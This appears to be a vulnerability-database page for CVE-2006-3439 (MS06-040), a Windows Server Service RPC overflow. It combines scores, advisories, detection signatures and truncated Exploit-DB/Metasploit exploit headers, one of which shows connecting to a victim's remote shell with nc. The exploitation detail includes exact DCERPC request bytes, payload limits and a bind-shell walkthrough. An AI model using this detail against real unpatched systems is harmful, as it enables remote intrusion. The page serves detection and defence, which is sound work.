CVE-2006-3439
Published 2006-08-09 · Exploited in the wild (ITW exploit, VulnCheck KEV)
Priority: P2 (76, critical)
CVSS 2.0: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
EPSS: 84.08% (99.7th percentile)
Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
Detection & IOCs (extracted from sources)
Byte signatures:
- Stack cookie constant (Windows 2003 SP0 target): \x4e\xe6\x40\xbb
- DCERPC bind: \x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88\x03\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00
- DCERPC request header: \x05\x00\x00\x03\x10\x00\x00\x00\x30\x08\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x1f\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00
Detection notes:
- Detect crafted DCERPC NetpwPathCanonicalize (opnum 0x1f) calls to the srvsvc/browser named pipe over SMB (ports 139/445). The RPC UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0 is the target interface.
- For Windows 2003 SP0 exploitation, look for the constant stack cookie value 0x4e, 0xe6, 0x40, 0xbb embedded in the RPC path argument of a NetpwPathCanonicalize request.
- The exploit targets anonymous/unauthenticated SMB sessions (empty username/password) to the IPC$ share and then opens the \pipe\browser named pipe. Anomalous unauthenticated IPC$ connections followed by BROWSER pipe access should be alerted on.
- Payload bad characters for this exploit are \x00\x0a\x0d\x5c\x5f\x2f\x2e; IDS/IPS rules inspecting the RPC stub data for oversized path arguments should flag buffers of 600–1100 bytes that avoid these characters.
- Stack adjustment prepend bytes \x81\xc4\xff\xef\xff\xff\x44 (sub esp, 0xffffefff / inc esp) appear at the start of shellcode in exploit payloads and can be used as a shellcode signature.
- The exploit sends the DCERPC request twice if the first attempt returns stub data (server rejection). Two rapid identical opnum 0x1f requests to the same pipe within milliseconds is a strong behavioral indicator.
- For Windows XP SP2 detection, the exploit checks for error code 0xc0000022 (STATUS_ACCESS_DENIED) when opening the \SRVSVC pipe; this probing behavior (opening \SRVSVC before exploitation) can be detected.
- Exploitation causes a denial of service (not code execution) on Windows XP SP2 and Windows Server 2003 SP1 due to /GS stack protection; a failed attempt on Windows 2000 causes a full reboot.
- The payload space is intentionally limited to 370 bytes to maintain a single request format across all Windows service packs; larger payloads may be technically possible but break cross-SP compatibility.
- The exploit supports both direct SMB (port 445) and NetBIOS SMB (port 139) transports; detection rules must cover both ports.
- Windows NT 4.0 requires adjusted SMB/DCERPC pipe write sizes (min 2048, max 4096) for successful exploitation; anomalous large pipe write sizes may indicate NT 4.0 targeting.
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | — | 7.5 | HIGH | — |
GHSA
GHSA-6fx8-xxf2-xjj8 (ghsa_unreviewed · 2022-05-01 · CVSS 7.5, HIGH)
Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314.
VulnCheck
Microsoft Windows Out-of-bounds Write (vulncheck · 2006 · CVSS 7.5, HIGH)
Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314.
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a9c54f79-d780-437b-a7f5-a74960e299d5&CommunityKey=8af7f28f-02f1-4107-8639-93a60b6546d4&tab=librarydocuments; https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_ju
No detection rules found.
Exploit-DB
Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit) (exploitdb · 2011-02-17)
---
```ruby
##
# $Id: ms06_040_netapi.rb 11762 2011-02-17 03:56:15Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Server Service NetpwPathCanonicalize Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function
using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that
other RPC calls could be used to exploit this service. This exploit will result in
a denial of
```
Exploit-DB
Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit) (exploitdb · 2006-09-13)
---
```perl
#########################################################################
# netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0)
#
# Author: Trirat Puttaraksa (Kira)
#
# http://sf-freedom.blogspot.com
#
# For educational purpose only
#
# Note: This exploit is developed because of my question "Is it exploitable
# on Windows Server 2003 platform ?". As I know, Windows XP SP2 and Windows
# Server 2003 SP1 is not exploitable because they are compiled with /GS, but
# how about Windows Server 2003 SP0 ? In metasploit netapi_ms06_040.pm there
# is no Windows Server 2003 sp0 target, this means 2003 SP0 is not
# exploitable ? There is Stack Protection Windows Server 2003, is this the
# reasons w
```
Exploit-DB
Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2) (exploitdb · 2006-08-28)
---
```c
/*
 * MS06-040 Remote Code Execution Proof of Concept
 *
 * Ported by ub3r st4r aka iRP
 * ---------------------------------------------------------------------
 * Tested Against:
 * Windows XP SP1
 * Windows 2000 SP4
 *
 * Systems Affected:
 * Microsoft Windows 2000 SP0-SP4
 * Microsoft Windows XP SP0-SP1
 * Microsoft Windows NT 4.0
 * ---------------------------------------------------------------------
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission
 * to do so.
 *
 * PRIVATE v.0.2 (08-27-06)
 */
#include
#include
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
unsigned cha
```
Exploit-DB
Microsoft Windows - CanonicalizePathName() Remote (MS06-040) (exploitdb · 2006-08-19)
---
```c
/*
Microsoft Windows CanonicalizePathName() Remote Overflow MSO6-040
More info: http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx
Written by Preddy
This is another version of hdm's metasploit version but ported to C,
Works against Windows XP SP1
And it should give a crash on Win2k in services.exe
On successfull exploitation it provides a remote shell at port 54321
of your victim:
./ms06 192.168.1.103
Target: 192.168.1.103
Attack Finished: now open a new terminal and nc to your victim on port 54321
Warning: Don't close this window!
[open a new terminal/window/prompt]
nc 192.168.1.103 54321
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
http://www.te
```
Exploit-DB
Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit) (exploitdb · 2006-08-10)
---
```perl
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::netapi_ms06_040;
use base "Msf::Exploit";
use strict;
use Pex::DCERPC;
use Pex::NDR;
my $advanced = {
    'FragSize'    => [ 256, 'The DCERPC fragment size' ],
    'BindEvasion' => [ 0, 'IDS Evasion of the bind request' ],
    'DirectSMB'   => [ 0, 'Use direct SMB (445/tcp)' ],
};
my $info = {
    'Name' => 'Microsoft NetpIsRemote() MSO6-040 Overflo
```
Metasploit
MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow (metasploit)
This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all SMB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/21388
- http://securitytracker.com/id?1016667
- http://www.cisco.com/en/US/products/ps6120/tsd_products_security_response09186a008070c75a.html
- http://www.dhs.gov/dhspublic/display?content=5789
- http://www.kb.cert.org/vuls/id/650769
- http://www.securityfocus.com/bid/19409
- http://www.us-cert.gov/cas/techalerts/TA06-220A.html
- http://www.vupen.com/english/advisories/2006/3210
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-040
- https://exchange.xforce.ibmcloud.com/vulnerabilities/28002
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A492